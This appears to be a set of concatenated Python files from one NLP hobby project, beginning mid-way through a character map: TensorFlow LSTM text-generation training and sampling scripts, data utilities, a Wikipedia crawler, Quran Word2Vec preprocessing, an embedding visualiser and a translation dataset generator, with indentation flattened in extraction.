70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
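# shape sketch with assumed numbers: for len(arr) = 1000, batch_size = 10 and n_steps = 50,
# chars_per_batch = 500 and n_batches = 2; each yielded x and y has shape (10, 50), with y
# equal to x shifted one character to the left (zero-filled where the array runs out).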
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
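# sketch of the resulting objects (assumed sizes): with lstm_size=256 and num_layers=2 the
# MultiRNNCell stacks two 256-unit BasicLSTMCells, each wrapped in a DropoutWrapper on its
# outputs, and initial_state is a tuple of two zeroed LSTMStateTuples of shape (batch_size, 256).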
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
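# shape sketch with the hyperparameters above (vocabulary size is an assumption): with
# batch_size=256, num_steps=70 and num_classes=193, logits has shape (256*70, 193); targets
# (256, 70) is one-hot encoded to (256, 70, 193), reshaped to match logits, and the softmax
# cross entropy is averaged over every character position.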
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optimizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: clipping threshold used to prevent exploding gradients
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
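# A small numpy sketch of what tf.clip_by_global_norm does above (illustration
# only; the values are made up): all gradients are rescaled jointly by
# clip_norm / global_norm whenever the global norm exceeds clip_norm.
import numpy as np
_grads = [np.array([3.0, 4.0]), np.array([0.0])]
_global_norm = np.sqrt(sum((g ** 2).sum() for g in _grads))   # 5.0
_clip_norm = 2.5
_scale = min(1.0, _clip_norm / _global_norm)                  # 0.5
_clipped = [g * _scale for g in _grads]                       # [[1.5, 2.0], [0.0]]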
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
    batch_size, num_steps = 1, 1
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# There are lstm_size nodes in the hidden layers, and the number of
# total characters is num_classes (i.e. the output layer size)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
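# A hedged usage sketch for the sampling mode (commented out; the checkpoint
# path and the char2int/int2char lookups are assumptions for illustration):
# sample_model = CharRNN(num_classes=num_classes, sampling=True)
# with tf.Session() as sess:
#     tf.train.Saver().restore(sess, "checkpoints/e13_l256.ckpt")
#     state = sess.run(sample_model.initial_state)
#     current, out_chars = char2int["T"], ["T"]
#     for _ in range(200):
#         feed = {sample_model.inputs: [[current]],
#                 sample_model.keep_prob: 1.0,
#                 sample_model.initial_state: state}
#         preds, state = sess.run([sample_model.prediction,
#                                  sample_model.final_state], feed_dict=feed)
#         current = np.random.choice(len(preds[0]), p=preds[0])
#         out_chars.append(int2char[current])
#     print("".join(out_chars))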
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '$': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
                   '/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, ';': 30, '<': 31, '=': 32, '>': 33, '?': 34, '@': 35,
                   'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '`': 67,
                   'a': 68, 'b': 69, 'c': 70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '~': 97}
# Entries 98-192 mapped non-ASCII (extended Latin) characters such as '\xad': 106;
# those characters were lost when this file was extracted, so they are omitted here.
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except (ValueError, TypeError):
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
    form = "{days}d " + form
if months:
    form = "{months}m " + form
if years:
    form = "{years}y " + form
return form.format(**locals())
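# Quick formatting check for get_time (values verified by hand):
#   get_time(42)     -> "00:00:42"
#   get_time(93784)  -> "1d 02:03:04"   (1 day, 2 hours, 3 minutes, 4 seconds)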
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, embedding_dim
model = Sequential()
# +1 because word indices start at 1 and 0 is reserved for padding
model.add(Embedding(len(vocab) + 1, embedding_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
# model.fit(...)  # the training data/labels for this skeleton were never wired up
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
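# Example of chunk_seq splitting as evenly as float striding allows:
#   chunk_seq(list(range(7)), 3) -> [[0, 1], [2, 3], [4, 5, 6]]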
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917@gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run `tensorboard --logdir={0}` to visualize the embeddings in TensorBoard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model in word2vec format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except IndexError:
    print("Please provide model path and output path")
    sys.exit(1)
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '.' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# samples containing this many (or more) _unk_ tokens are dropped
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# drop samples that contain too many _unk_ tokens on either side
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
